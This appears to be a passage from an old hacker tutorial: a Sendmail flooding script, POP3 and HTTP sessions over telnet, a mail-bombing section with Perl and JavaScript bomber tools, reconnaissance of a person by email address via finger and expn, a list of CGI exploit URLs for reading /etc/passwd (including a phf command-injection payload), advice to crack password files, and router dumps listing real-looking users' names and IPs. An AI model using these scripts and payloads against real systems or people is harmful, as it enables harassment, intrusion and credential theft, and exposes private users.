\"data\"" >>$PLIK echo "cat <<__qniec__" >>$PLIK cat $1 >>$PLIK echo "__qniec__" >>$PLIK echo "echo \".\"" >>$PLIK echo "echo \"quit\"" >>$PLIK echo "sleep $TIMEOUT" >>$PLIK chmod +x $PLIK echo "OK" echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort." SENT=0 while [ -f $1 ]; do $PLIK|telnet $3 25 &>/dev/null & let SENT=SENT+1 echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b" CONNECTED=`ps|grep -c "telnet $3"` if [ "$LIMIT" -le "$CONNECTED" ]; then while [ "$LIMIT" -le "$CONNECTED" ]; do sleep 1 done fi if [ "$SENT" -ge "$MAX" ]; then echo "It's just an example, sorry." echo exit 0 fi done -- EOF -- Suggested fix: insert additional length limit into HELO/EHLO parameter scanning routine OR disable AllowBogusHELO (but it may cause serious troubles). I have no 8.8.8 sources at the time, so execuse me if it's unclear. PS: -- From: Gregory Neil Shapiro I was able to reproduce the header problem by lengthening the HELO string in your script. [...] This will be fixed in sendmail 8.9. -- ******ROOTSHELL*********** Receiving mail without an Email client POP3 (Port 110) Now that you know practicaly almost everything that one can think about sending emails, let's move on to receiving emails the kewl way.Normally what you do is launch your favourite email client and click on the receive buttton to start downloading new messages.Now the email client connects to youe mail server and starts issuing POP commands.So this is how a normal procedure of downloading emails takes place. ************* Hacking Truth: Just like Outlook Express maintains a log file which contains various POP commands that it issued to download emails from the mail server. This file is the POP.log file which is again stored in the "c:\windows\Applicartion Data" folder.Just search for it.One can go through it to find out the Username, mail server and also the length of password of the victim. ************* So what exactly is POP? POP or Post Office Protocol is nothing but a protocol which is used to download messages from a mail server.A mail server implementing the the POP protocol stores the emails for users.It serves email clients which download messages by giving POP commands.A POP server stores the email until the user log in to retrieve the messages.Once the messages are downloaded, the server no longer maintains them. POP3 is nothing but the third version that is the latest version of the Post Office Protocol. The POP daemon runs by default on Port 110 and is not as co operative as Sendmail is and also does not provide any help.Unlike the Sendmail daemon it requires the user to enter a UserName and Password. Hence, A person is not able to download emails unless and until he has authenticated himself by providing a User Name and Password.So let's learn POP3. Launch Telnet and telnet to Port 110 of your mail server by issuing the command: telnet mail2.isp.net 110 You will be welcomes by the daemon banner, which would probably be something like: +OK QPOP (version 2.53) at delhi1.mtnl.net.in starting. This means that the daemon is ready for your input. Now let's see what happens if you type Help at the prompt.Most servers will disconnect you as soon as it encounters a wrong move from the client.My ISP does not disconnect me but I do not get any response at all.The Telnet client just hangs.The '?' command too doesn't bring about any response.The POP daemon is really cranky and it doesn't stand any 'roobish' (read rubbish) at all.So unfortunately all those of all who are as forgetful as I am will have to somehow remember POP commands. Firstly before you can issue any other command, one has to provide the POP daemon with a Username and Password.So use the USER command to provide the Password and the PASS command to provide the password.Let's say my Username is ankit and the password is hackingtruths, then I would login in the following way: USER ankit The server replies: +OK Password required for ankit. Now we need to give the POP daemon what it needs a password: PASS hackingtruths The server replies: +OK ankit has xx messages (yyyyy octets). Where xx is the number of new messages and yyyyy is the space occupied by them. For example if I have 22 new messages which occupy 135981 octets then I would get something like: +OK ankit has 22 messages (135981 octets). Now if either the username or Password is incorrect them you will receive an error message, something like: -ERR Bad login (If the Username is invalid) -ERR Password supplied for "usernamehere" is incorrect. (If the Username is correct but the Password is incorrect.) Now that you have verified yourself, let's list the new messages by giving the 'list' command. For Example, I have 2 new message in my Inbox and when I give the list command the server return the following: I type the list command: list The server returns +OK 2 messages (8164 octets) 1 2471 2 5693 . The numbers on the right of each message number is the size of the new email. Note the email numbers which in the above case are 1 and 2 are important as they are used to delete or read a particular email.They act as what filenames act to files.Now to read a particular messge type the 'retr' command followed by the email number. For Example to view the email whose number is 1, I type: retr 1 This is show the entire email with full headers.Make sure you log that particular session before you try to view messages this way as messages scroll past at a very high speed. Similiarly the 'dele' command followed by the message number can be used to delete a pasticular message.For example, the first email can be deleted by giving the command: dele 1 The server responds: +OK Message 1 has been deleted. There is yet another not so well known command, the 'stat' command which gives the number of new messages and the size of the new messages. For example, I type stat: Stat The server responds: +OK 22 135981 Indicating that I have 22 new messages whose total size is 135981 Once you are done with everything type the 'quit' command to end the session. The server responds: +OK Pop server at delhi1.mtnl.net.in signing off. MailBombing Mailbombing means to send a huge number of emails (maybe hundres, thousands or even millions)to a single email account so that the maximum space of the account is filled up and the owner of the account cannot receive any other important emails and it becomes difficult for the user to read existing emails due to gigantic number of emails. All email accounts have a maximum space limit, for example Yahoo has a space limit of 3 MB. Now if this maximum space is filled up then no new messages can come and the mail server sends back any new messages that come, one the maximum allowed capacity is filled.(Some services allow the users to exceed the assigned limit.)So if the victim who has been mail bombed is excepting any new important messages then he can pretty much kiss them goodbye.Not only that, his Inox is filled with so many new useless messages, he cannot even read the existing messages and deleting all the useless messages takes up a lot of valuable time. MailBombing is a very irritating and a lame thing to do.It is the malest thing a hacker could possibly do but I am just putting forward all info that I can. Do not mail bomb someone, I certainly do not recommend it. There are 2 types of mailbombing-: 1. Mass Mail Bombing 2. List Linking The Mass Mail Bombing Method In this kind of mail bombing the victim's Inbox is flooded with a huge number of the same emails. There are mail bombing software which allow you to send a particualar message as many times as you want using a SMTP server.Some mail bombing software also allows you to send a particular message perpetually.A mail bombing software can easily be made in Perl.The following is a script that I picked up somewhere on the net(It runs only on Unix platforms): #!/bin/perl $mprogram= '/usr/lib/sendmail'; $victim= 'victim@hostname.com'; $var=0; while($var < 1000) { open(MAIL, "|$mprogram $victim") || die "Can't open Mail Program\n"; print MAIL "Mail Bomb"; close(MAIL); sleep(4); $var++; } This Perl script will send 1000 mails to the victim.It can easily be modified to send 100000 messages instead of only 1000. Such kind of mail bombing has one shortcoming, say you sent the victim 1000 messages, but once the victim has deleted them, that's it, that's the end of the whole idea of mail boming the victim.This is where List Linking comes in as it is more effective in harassing the victim. List Linking In this kind of mail bombing the victim is subscribed to thousands of mailing list whose subjects range from Beetle lovers to people interested in seeing earthworms eat things.This kind of mail boming is more effective as the victim has to find out ways of unsubscribing himself from this long list of boring mailing lists.Believe me, many people have problems unsubscribing from mailing lists. The most common method used by people to mail bomb someone, is to use Mail Bombing Software.Mail Bombing software asks for the victim's email address, the address of a SMTP server, the forged email address from which you want the mail bombs to appear to have come and the number of emails that have to be sent and of course the body of the mail bomb.Mail Bombing is as easy as a few clicks and it is really common amonngst lamers with a huge ego. Now let's see what you do when you are mail bombed.You open your Inbox and find that you have 20000 new messages with the same subject "You suck!!!". So you are sure that, that lamer that hates you so much has proved his lameness(is that a word?) by mail bombing you. No..you do not start downloading all the 20000 messages and then delete them, instead you log on to the POP port of your mail server and delete the useless mails by issuing POP commands.If you are able to read the headers well enough then you can easilt trace the mail bomber and kick him off his ISP by complaining to tech support. Mail Bombers are very simple to design.Having knowledge of C or Perl can make things really really easy.I designed a Simple Mail Bomber in JavaScript.Although not too efficient, it gives you an idea, how easy it is to make a Mail Bomber. It also allows you to specify the number of bombs.The only shortcoming is that the victim will easily know who sent the mail bombs as this JavaScript Bomber does not forge email, instead it uses the user's normal read email address to bomb the victim.To understand the code you need to know HTML and JavaScript. Simply copy and paste the following code into Notepad and save it as .htm or .html file. ############CUT HERE########### Ankit's MailBomber

Victim's Email Address:

Number of Email Bombs:

Subject:

Message:





Coded By: Ankit Fadia----ankit@bol.net.in
http://hackingtruths.tripod.com For more tutorials send an email to: programmingforhackers-subscribe@egroups.com
##########CODE ENDS HERE######## HTTP Torn Apart(Port 80) What exactly happens when you type a URL(Uniform Resource Locator) in the location bar of the browser? Well firstly the browser performs a DNS queiry and converts the human readable domain name (like hotmail.com) into a machine readable IP address. Once the browser gets the IP address of the host, it connects to Port 80(The HTTP daemon by default runs on Port 80) of the remote host and asks the host for a particular document or page with the help of HTTP commands. HTTP or HyperText Transfer Protocol is the protocol used by browsers to communicate with hosts i.e. to ask for a particular file at a specific URL or to send or post data to the server.We are never aware of this process which occurs in the background. Now in this section we will learn to do manually what the browser does automatically.When the browser asks for a file at a specific URL it is said to 'request' for information. Now before we move on, let's see what a typical request looks like. A typical HTTP request would be something like the below: get url HTTP/1.1 Let's see what the specific parts of a typical request stands for.The first word i.e. the 'get' part is called the method.There are 3 types of methods-: The Get method The 'get' method is the most common method which is widely used.It is with the 'get' method that the browsers request for pages or douments.In this kind of method you are the client(browser) and request for a page from the server which is the host you are connected to. The Post Method The 'post' method is used to upload files to the server.This kind of method is used say when you upload your website by using not the FTP service but by straightaway uploading files through a HTML page.In this method there is a reversal of roles and now you become the server and the host you are connected to becomes the client. The Head Method The 'head' method is the least popular method and not many people know about it.Although not widely used, it is still a part of HTTP methods. You would use the 'head' method say when you want to make sure that a particualar file exists at a particular URL without downloading the entire file.This method just downloads the header info of a particular file and not the entire file. All this might seem a bit weird, but I suggest that you just understand the basic difference between the various methods and then move on. Anyway coming back to the various parts of a HTTP request.The first part as you now know is the method, now the second part is the URL that you are requesting.Say for example I want to request the contacts.htm file then the HTTP request would look something like: get /contacts.htm HTTP/1.1 Now you may ask where the first '/' has come from. Now to understand that you need to look at the URL that you type into the Location bar of the browser.Say for example, the HTML file that you are requesting is http://www.microsoft.com/windows.htm then the URL would be what is left after removing the http:// and the domain name i.e. www.microsoft.com. Hence the URL is /windows.htm Now what will the URL be if you want to request for Yahoo homepage? Normally you write http://www.yahoo.com in the location bar to access Yahoo's homepage. Now if we remove the http:// and also the domain name(www.yahoo.com) then what is left? Nothing. This means the URL of the HTTP request is '/'. Hence the HTTP request now looks like. get / HTTP/1.1 The third part of the HTTP request is pretty self explanatory.The HTTP/1.1 specifies the version of the HTTP service used by the browser.So say if a server is running HTTP/1.1 and a browser which is running HTTP/1.0 requests a page then the server will send the page in terms of HTTP/1.0 only removing the enhancements of HTTP/1.1 So now that you know what a normal HTTP request sent by your browser looks, let's find out how we can do this manually.This too requires Telnet.Now you know how important the Telnet client is in a Hacker's armoury.So launch your Telnet client and connect to Port 80(As the HTTP daemon runs on Port 80) of any host.If the host you are trying to connect to does not have a website i.e does not have Port 80 open, then you would get a Error Message.If the connection is successful then the Title bar of your Telnet client will show the host address you are connected to and it will be ready for user input. The HTTP daemon is not as boring as it seems to be till now.Infact it is very very interesting.Once telnet is ready for input just type h (or any other letter) and hit enter twice. *********** Hacking Truth: After each HTTP command one has to press Enter Twice to send the command to the server or to bring about a response from a server.It is just how the HTTP protocol works. ********** Now as 'h' or any other command that you typed is not a valid HTTP command, the server will give you an error message, something like the below: HTTP/1.1 400 Bad Request Server: Netscape-Enterprise/3.5.1 The server replies with the version of HTTP it is running(not so important), it gives us an error message and the error code associated with it(again not so important), but it also gives us the OS name and OS version, it is running.Wow!!! It gives hackers who want to break into their server the ultimate piece of information which they require. Anyway now let's see what happens when we give a normal authentic request requesting for the main page of Yahoo.So after I telnet to Port 80 of www.yahoo.com I give the command: get / http/1.1 (requesting for the Yahoo Homepage) HTTP/1.0 200 OK Content-Length: 12085 Content-Type: text/html (No OS name,interesting, well Yahoo being a Top Web Company has configured their server to not display the OS name and Version when an HTTP request is encountered.) Yahoo!

Yahoo
Yahoo! Auctions
Pokemon, cars, 'N Sync
Yahoo! MessengerYahoo! Mail
free email for life
advanced search
Shopping - Auctions - Yellow Pages - People Search - Maps - Travel - Classifieds - Personals - Games - Chat - Clubs
Mail - Calendar - Messenger - Companion - My Yahoo! - News - Sports - Weather - TV - Stock Quotes - more...
Yahoo! Shopping - Thousands of stores. Millions of products.
DepartmentsStoresProducts
· Apparel
· Bath/Beauty
· Computers
· Electronics
· Flowers
· Sports
· Music
· Video/DVD
· Eddie Bauer
· Ashford
· Toys R Us
· Nordstrom
· 'N Sync
· Digital cameras
· Pokemon
· MP3 players
Arts & Humanities
Literature, Photography...

Business & Economy
Companies, Finance, Jobs...

Computers & Internet
Internet, WWW, Software, Games...

Education
College and University, K-12...

Entertainment
Cool Links, Movies, Humor, Music...

Government
Elections, Military, Law, Taxes...

Health
Medicine, Diseases, Drugs, Fitness...
News & Media
Full Coverage, Newspapers, TV...

Recreation & Sports
Sports, Travel, Autos, Outdoors...

Reference
Libraries, Dictionaries, Quotations...

Regional
Countries, Regions, US States...

Science
Animals, Astronomy, Engineering...

Social Science
Archaeology, Economics, Languages...

Society & Culture
People, Environment, Religion...
In the News
·Reno says Elian to be returned to father
·Zimba bwe land seizures continue
·The Masters, MLB, NBA
more...
Marketplace
·Y! Tax Center - tax guide, online filing, and more
·Y! Business Marketplace - products for all industries
·Free 56K Internet Access
·Yahoo! Bill Pay - free 3-month trial
more...
Inside Yahoo!
·Y! Movies - showtimes, reviews, info
·Yahoo! Photos - upload, share, and print pictures
·Play free Fantasy Baseball
·Yahoo! GeoCities - build your free home page
more...
World Yahoo!sEurope : Denmark - France - Germany - Italy - Norway - Spain - Sweden - UK & Ireland
Pacific Rim : Asia - Australia & NZ - China - Chinese - HK - Japan - Korea - Singapore - Taiwan
Americas : Argentina - Brazil - Canada - Mexico - Spanish
Yahoo! Get LocalLA - NYC - SF Bay - Chicago - more...    
OtherAutos - Careers - Digital - Entertainment - Event Guide - Greetings - Health - Invites - Net Events
Message Boards - Movies - Music - Real Estate - Small Business - Y! Internet Life - Yahooligans!
Yahoo! prefers
How to Suggest a Site - Company Info - Privacy Policy - Terms of Service - Contributors - Openings at Yahoo!

Copyright © 2000 Yahoo! Inc. All rights reserved.
Copyright Policy

The get method gives the HTML source of the document requested.It seems just as if you are seeing the source by clicking View> Source. Similiarly you can see what happens when you issue the 'PUT' and 'Head' methods.Just replace 'Get' with the Method that you want to use.For Example, head / http/1.1 and put/ http/1.1 **************** Hacking Truth: Let's go back to the response that we got from the HTTP daemon once the HTTP Get method was okayed at Yahoo.The first line of the response was: HTTP/1.0 200 OK Now what does this 200 signify? Well the '200' is called the status code.Whenever you give the server a HTTP command, it processes the command and accrodingly displays a status code.A status code is a 3 digit code in the form of xxx. Status codes start from 1xx to 5xx.I am not sure what the 1xx series signifies as they are rarely used.The 2xx series signify a succssful completion of the HTTP command given.The 3xx series signify errors due to moving of documents.The 4xx series signify errors caused at browser side and finally the 5xx series signify errors at the server side. The most common status code that you come across, but may not have ever see is the 200 OK status code.Each time you are able to see a page on the browser successfully, the browser has been sent this status code by the HTTP daemon. The most common errors that you might come across and actually see would be the 404 Error---Not Found. This error emssage means that the Url that you tying to access is not found, it has either been moved or has been deleted or the linking of the web pages itself has not been done properly.I can go to the up directory to look for the exact new changed URL. *************** An email address is pretty much all you need to findout more about a person. Let's see how one can gather more information by just knowing the email address. Let's take my email address for example, ankit@bol.net.in Now normally the string after the '@' sign is the domain name of the ISP with which the user is registered.Hence the server of my ISP where you can find info on me would become bol.net.in. So you do a Port scan on bol.net.in but get the error message, Host Not Found. Sometimes the string after the '@' sign is not the domain name.Yes the server exists, but is probably behind a firewall and normal users do not have access to it from an untrusted external Network.So you know wxamine the headers of an email sent by me.You see something like the following line in almost all emails sent by me and the delhi1.mtnl.net.in thing is always there. Received: from bol.net.in by delhi1.mtnl.net.in (8.9.1/1.1.20.3/26Oct99-0620AM) id OAA0000001463; Thu, 13 Apr 2000 14:28:46 +0530 (IST) So you do a Port Scan on delhi1.mtnl.net.in. You find that the following Ports are open: 21 FTP 25 SMTP 79 Finger 80 HTTP 110 POP and more... The FTP daemon does not give much info on the users.So let's forget it.So you move on to the SMTP port. Almost all version of Sendmail allow the 'vrfy' and the 'expn' commands.The 'vrfy' commands verfies if a particular email address is valid or not.The 'expn' command expands a particular email address.By that what I mean to say is that it provides additional information on the user owning the supplied email address. For example,if we type the following while connected to Port 25, the server might respond with some interesting information on the user. expn ankit@bol.net.in For more details refer to the Sendmail Help. The 'expn' and the 'vrfy' commands are not bugs in Sendmail but the features which were orignally meant to do what they do now.Most ISP's have configured the Sendmail daemon such that it does not provide any info if it encounters these commands. Port 79 is by default the Finger Port.Unix users might know Finger as a command which gives more information about any user on the Internet whose email address is known.Unix users can finger a user by simply, typing: finger email_address@domain_name.com Windows users can use the DOS Telnet Client to telnet to Port 79. C:\windows>telnet delhi1.mtnl.net.in 79 (My ISP has disabled the Finger Port so do not even try..) No matter how you finger someone, you will either get an error message saying 'Access Denied' which means that the Finger Port is not open or you will be connected to the host with the Finger Daemon waiting for input. If you use a Windows Finger client (SamSpade I think so...) or Finger from Unix then the finger client automatically sends the user name which has to be fingered.But if you follow the Telnet method then when the Finger Daemon prompts for input, you will have to type the Username.For example, ankit The finger daemon would respond something like(I have inserted comments after \* [delhi1.mtnl.net.in] \* My ISP Login name: ankit In real life: Ankit Fadia \* My Login Name and my real Name Directory: /users/others/ankit Shell: /bin/ksh \* The Directory where my .plan and other files are stored and my shell type Last login Fri Dec 8 17:04 on ttyp0 from 202.xx.109.38 \* My Last Login Info with last IP No Plan. \* Error message as there is no .plan file in my User directory i.e. users/others/ankit When you register with your ISP, You provide them with some info (The form that You fill up??).Now a part of this info is always shown whenever someone fingers you.The additional information like the Home Address and the residence Number, Office address, Office telephone Number etc. are shown or provided only if the .plan file exits. So what exactly is a .plan file? Your home directory which is set by the system administrator contains some .plan files which are automatically created when you configure mail clients and other services.It also contains this .plan file which is not created automatically but the user has to create it himself.Sometimes your system administrator might create this file himself.Try to finger yourself and ensure that additional information about you is not displayed.If you find that fingering yourself gives out a lot of private information about you, then you should edit the .plan file or even delete it. The finger daemon is rarely running on systems nowdays.Even if it is running, the system administrators configure it to not display any information at all. The Finger daemon not only unwantingly display important info on the users but could also be used to get root.If you are real lucky and find an open Finger daemon then I suggest you try the following commands: finger root and finger system. Say you do not even know the email address of a person.You only know the domain name he owns.Now you want to find out more about him, what do you do? WHOIS holds the key..it will return the email address of the owner of the domain name and then you can carry out the same normal process. Hacking From your Web Browser Nowdays, most websites use CGI scripts (or sometimes C scripts) .Now these scripts are located in the /cgi-bin directory. What we want to do is, to download these scripts for further examination or even use these scripts to steal Passwords to access password protected parts of the website. So simply put something like the below in the location bar of your browser to access the directory where the scripts are stored. ftp://www.hostname.com/cgi-bin ftp://www.hostname.com/../cgi-bin http://www.hostname.com/cgi-bin The ' ../ ' tells Unix systems to go up one directory.On some systems you should try '../../' instead. The most common way to get the password file is to FTP anonymously and check if in the /etc directory access to the passwd(password file) is restricted or not.If it is not restricted then download the file and firstly unshadow it and then crack it. Some systems have a file called PHF in the /cgi-bin directory which allow remote access to all files inlcuding the /etc/passwd file. The following are a list of URL's you can try to get the password file: http://www.hostname.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd http://www.hostname.com/cgi-bin/php.cgi?/etc/passwd http://www.hostname.com/~root http://www.hostname.com/cgi-bin/test-cgi?* HTTP/1.0 http://www.hostname.com/cgi-bin/nph-test.cgi?* HTTP/1.0 http://www.hostname.com/samples/search/queryhit.html http://www.hostname.com/samples/search/webhits.exe http://www.hostname.com/_vti_pvt/service.pwd http://www.hostname.com/secret/files/default.asp ftp://www.hostname.com/etc/passwd http://www.hostname.com/cgi-bin/htmlscript?../../../../etc/passwd http://www.hostname.com/cgi-bin/view-source?../../../../../../../etc/passwd What we want to do is to download the scripts and to examine them as to how they can be used to break the normal sequence.CGI Scripts can be used to Nuke the host and also to mail the password file to anyone we want. Post Dial Up Screen Hacking The Post Dial Up Screen is the black terminal screen that comes up whenever you connect to a router, which asks for a Username and Password.After authentication, it prompts the user to enter the type of connection i.e. PPP or SLIP.This process occurs whenever you dial into your ISP.(Assuming that you have enabled the option.) When most of you connect to the Internet, do not have to go through this Post Dial Up Screen.This is because the 'Bring Up the Post Dial Up Screen' option is not enabled.To enable the Post Dial Up screen,simply follow the following steps: 1. Launch Dial Up Networking 2. Right Click on Your Connection name and select properties. 3. Under the General Tab click on the Configure Button. 4. Click on the Options Tab and select, bring up the Dial Up Screen After dialing option. 5. Click OK So now the next time, when you dial into your ISP, instead of directly verifying the Username and Password and connecting you, the Dial Up Connection will bring up a Black Window titled 'The Post DialUp Screen.'This screen symbolises the fact that we are now connected to the remote router of our ISP where the process of authentication takes place.It will ask for the Username and Password and once verified, we will get the prompt to specify the type of connection.The whole process would be something like: User Access Verification Username: ankit Password: delhinas4> When this prompt(NOTE: Instead of delhinas4 your ISP may have something else written.) comes, we need to specify the type of connection, we want to establish:PPP or SLIP. So typing PPP: delhinas4>ppp will result in my machine establishing a Point to Point Protocol(PPP)connection with my ISP. But we are hackers and we surely do not want to learn how to establish a PPP connection.So let's move on to interesting stuff.Like almost all systems on the Internet, this router prompt too gives us help.So let's see what happens when I ask for help. delhinas4>help Help may be requested at any point in a command by entering a question mark '?'. If nothing matches, the help list will be empty and you must backup until entering a '?' shows the available options. Two styles of help are provided: 1. Full help is available when you are ready to enter a command argument (e.g. 'show ?') and describes each possible argument. 2. Partial help is provided when an abbreviated argument is entered and you want to know what arguments match the input (e.g. 'show pr?'.) So let me try typing simply, '?'. delhinas4>? Exec commands: access-enable Create a temporary Access-List entry access-profile Apply user-profile to interface clear Reset functions connect Open a terminal connection disable Turn off privileged commands disconnect Disconnect an existing network connection enable Turn on privileged commands exit Exit from the EXEC help Description of the interactive help system lock Lock the terminal login Log in as a particular user logout Exit from the EXEC mrinfo Request neighbor and version information from a multicast router mstat Show statistics after multiple multicast traceroutes mtrace Trace reverse multicast path from destination to source name-connection Name an existing network connection pad Open a X.29 PAD connection ping Send echo messages ppp Start IETF Point-to-Point Protocol (PPP) resume Resume an active network connection --More-- rlogin Open an rlogin connection show Show running system information slip Start Serial-line IP (SLIP) systat Display information about terminal lines telnet Open a telnet connection terminal Set terminal line parameters traceroute Trace route to destination tunnel Open a tunnel connection where List active connections x28 Become an X.28 PAD x3 Set X.3 parameters on PAD Wow!!! I got a whole list of allowed commands and also a single line description of each command.The router that we are connected to provides help on specific commands too.Anyway, let's try some kewl commands which reveal some very very useful info.I have inserted comments, wherever needed.The commands I type begin with the delhinas4> prompt. delhinas4> mrinfo % Timed out receiving response [Editor:Well the mrinfo command is supposed to get info from routers, but unfortunately it always times out when I try it on my ISP, so let's try giving the famous systat command.] delhinas4>systat Line User Host(s) Idle Location 3 tty 3 tkdutta Async interface 00:00:05 4 tty 4 mmanoj Async interface 00:01:13 6 tty 6 mpshukla Async interface 00:04:38 10 tty 10 chawlaep Async interface 00:00:01 14 tty 14 techshar Async interface 00:00:00 15 tty 15 dscl Async interface 00:00:34 17 tty 17 utility Async interface 00:00:28 19 tty 19 saraswti Async interface 00:00:07 25 tty 25 affvvdel Async interface 00:12:48 26 tty 26 sanjiv3 Async interface 00:00:00 27 tty 27 vvs Async interface 00:00:00 28 tty 28 herz1313 Async interface 00:00:00 31 tty 31 neccinfo Async interface 00:00:01 32 tty 32 gmmm Async interface 00:00:07 35 tty 35 cebw Async interface 00:00:00 37 tty 37 delhinet Async interface 00:00:00 40 tty 40 digdelhi Async interface 00:01:14 47 tty 47 giansu Async interface 00:00:06 50 tty 50 tafazal Async interface 00:00:01 51 tty 51 translnk Async interface 00:00:02 52 tty 52 procurez Async interface 00:05:14 53 tty 53 triden Async interface 00:00:05 --More-- Line User Host(s) Idle Location 56 tty 56 prerna Async interface 00:00:00 58 tty 58 saroj Async interface 00:03:18 * 61 tty 61 ankit idle 00:00:01 68 tty 68 veekay Async interface 00:00:24 70 tty 70 kachi Async interface 00:00:01 74 tty 74 aqmohan Async interface 00:00:07 78 tty 78 mmdutta Async interface 00:00:00 81 tty 81 ks1assoc Async interface 00:00:00 87 tty 87 adinfo Async interface 00:00:35 88 tty 88 anni Async interface 00:00:00 89 tty 89 drrajive Async interface 00:00:04 107 tty 107 orienapp Async interface 00:00:34 109 tty 109 hmsdir Async interface 00:00:01 110 tty 110 anandpro Async interface 00:00:01 112 tty 112 guptalam Async interface 00:00:12 113 tty 113 airtalks Async interface 00:00:02 115 tty 115 yatish Async interface 00:00:27 117 tty 117 ttlnet4 Async interface 00:00:05 118 tty 118 dgmodlxr Async interface 00:00:00 120 tty 120 cdacd Async interface 00:00:00 The systat command gives us a list of currently logged on users.From the output, I now know their Usernames (and email addresses obviously.)and the Time for which they have been online.But this info is not that useful, so let's try out the 'who' command.Note the '*' preceeding the Username with which I have logged into this router. delhinas4>who delhinas5>who Line User Host(s) Idle Location 14 tty 14 jbagga Async interface 00:00:00 PPP: 203.xx.248.119 15 tty 15 ptat Async interface 00:03:33 PPP: 203.xx.248.151 16 tty 16 dlgrp Async interface 00:00:00 PPP: 203.xx.248.70 19 tty 19 viprirag Async interface 00:00:02 PPP: 203.xx.248.2 22 tty 22 uaedcnd Async interface 00:00:00 PPP: 203.xx.248.147 28 tty 28 entasis Async interface 00:00:34 PPP: 203.xx.248.140 29 tty 29 ehircrc Async interface 00:00:00 PPP: 203.xx.248.137 34 tty 34 najiaero Async interface 00:10:07 PPP: 203.xx.248.221 37 tty 37 amritp Async interface 00:00:40 PPP: 203.xx.248.50 39 tty 39 bagris Async interface 00:00:00 PPP: 203.xx.248.143 40 tty 40 manish11 Async interface 00:00:00 PPP: 203.xx.248.233 42 tty 42 sunilg Async interface 00:00:00 PPP: 203.xx.248.76 48 tty 48 dreamtec Async interface 00:00:20 PPP: 203.xx.248.5 50 tty 50 iii111 Async interface 00:00:01 PPP: 203.xx.248.187 53 tty 53 azure Async interface 00:00:00 PPP: 203.xx.248.186 55 tty 55 gsubbn Async interface 00:00:00 PPP: 203.xx.248.83 62 tty 62 tubetool Async interface 00:01:33 PPP: 203.xx.248.169 64 tty 64 neratele Async interface 00:01:10 PPP: 203.xx.248.124 65 tty 65 grecy Async interface 00:00:00 PPP: 203.xx.248.208 68 tty 68 ians Async interface 00:00:55 PPP: 203.xx.248.194 70 tty 70 prabal Async interface 00:00:06 PPP: 203.xx.248.1 71 tty 71 kwkicd Async interface 00:00:08 PPP: 203.xx.248.155 --More-- Line User Host(s) Idle Location 73 tty 73 seco1 Async interface 00:00:01 PPP: 203.xx.248.230 74 tty 74 neelamm Async interface 00:00:00 PPP: 203.xx.248.32 75 tty 75 ukiran Async interface 00:00:07 PPP: 203.xx.248.53 76 tty 76 anandtsg Async interface 00:00:55 PPP: 203.xx.248.160 85 tty 85 avntin Async interface 00:06:14 PPP: 203.xx.248.126 87 tty 87 pnddelhi Async interface 00:00:00 PPP: 203.xx.248.144 88 tty 88 spph Async interface 00:00:02 PPP: 203.xx.248.108 * 89 tty 89 ankit idle 00:00:00 92 tty 92 krsawhny Async interface 00:00:14 PPP: 203.xx.248.192 94 tty 94 kashyaps Async interface 00:00:13 PPP: 203.xx.248.117 95 tty 95 slalklal Async interface 00:00:00 PPP: 203.xx.248.146 100 tty 100 computer Async interface 00:00:04 PPP: 203.xx.248.228 101 tty 101 kanchan1 Async interface 00:00:25 PPP: 203.xx.248.178 102 tty 102 kanhya Async interface 00:00:38 PPP: 203.xx.248.99 103 tty 103 dsidc Async interface 00:00:00 PPP: 203.xx.248.225 104 tty 104 nsl Async interface 00:00:00 PPP: 203.xx.248.152 106 tty 106 iconint Async interface 00:00:00 PPP: 203.xx.248.222 113 tty 113 atri Async interface 00:00:00 PPP: 203.xx.248.85 117 tty 117 striker Async interface 00:00:00 PPP: 203.xx.248.30 118 tty 118 coin Async interface 00:01:01 PPP: 203.xx.248.231 120 tty 120 snwadhwa Async interface 00:00:00 PPP: 203.xx.248.66 123 tty 123 prithvib Async interface 00:00:00 PPP: 203.xx.248.67 --More-- Line User Host(s) Idle Location 124 tty 124 itssupp Async interface 00:00:02 PPP: 203.xx.248.93 125 tty 125 jukebox Async interface 00:03:45 PPP: 203.xx.248.44 129 tty 129 pwhelan Async interface 00:00:04 PPP: 203.xx.248.106 134 tty 134 kapil1 Async interface 00:00:02 PPP: 203.xx.248.215 142 tty 142 infoplex Async interface 00:00:03 PPP: 203.xx.248.159 143 tty 143 tanya74 Async interface 00:00:00 PPP: 203.xx.248.88 150 tty 150 kapuras Async interface 00:00:33 PPP: 203.xx.248.65 154 tty 154 mpliwal Async interface 00:00:46 PPP: 203.xx.248.94 155 tty 155 aatishi Async interface 00:00:00 PPP: 203.xx.248.179 156 tty 156 gcdmrc Async interface 00:00:00 PPP: 203.xx.248.205 164 tty 164 mland Async interface 00:00:00 PPP: 203.xx.248.61 168 tty 168 creation Async interface 00:03:10 PPP: 203.xx.248.55 169 tty 169 dgupta Async interface 00:00:02 PPP: 203.xx.248.29 173 tty 173 skylink Async interface 00:00:04 PPP: 203.xx.248.120 175 tty 175 rsystems Async interface 00:00:01 PPP: 203.xx.248.75 183 tty 183 hmpl Async interface 00:00:00 PPP: 203.xx.248.19 185 tty 185 dartinc Async interface 00:00:13 PPP: 203.xx.248.114 187 tty 187 rajive Async interface 00:00:02 PPP: 203.xx.248.204 189 tty 189 clinepi Async interface 00:00:46 PPP: 203.xx.248.72 191 tty 191 sammy Async interface 01:01:00 PPP: 203.xx.248.42 192 tty 192 atrish Async interface 00:01:47 PPP: 203.xx.248.176 202 tty 202 skylink Async interface 00:00:12 PPP: 203.xx.248.118 --More-- Line User Host(s) Idle Location 207 tty 207 recom Async interface 00:00:01 PPP: 203.xx.248.35 211 tty 211 pusapoly Async interface 00:01:52 PPP: 203.xx.248.91 212 tty 212 rkglobal Async interface 00:00:57 PPP: 203.xx.248.36 219 tty 219 arajan Async interface 00:00:03 221 tty 221 sudhanju Async interface 00:00:00 PPP: 203.xx.248.102 225 tty 225 kkapahi Async interface 00:00:03 PPP: 203.xx.248.142 226 tty 226 lbsbra Async interface 00:00:00 PPP: 203.xx.248.183 227 tty 227 humra1k Async interface 00:00:01 PPP: 203.xx.248.64 239 tty 239 adcr Async interface 00:00:08 PPP: 203.xx.248.52 Vi2 exhibind Virtual PPP (Bundle) 00:00:27 Vi3 genpr Virtual PPP (Bundle) 00:09:14 Vi4 netcafe Virtual PPP (Bundle) 00:00:00 Vi6 bcddel Virtual PPP (Bundle) 00:00:00 Se6:4 cbidelzo Sync PPP 00:00:00 Se6:5 websityg 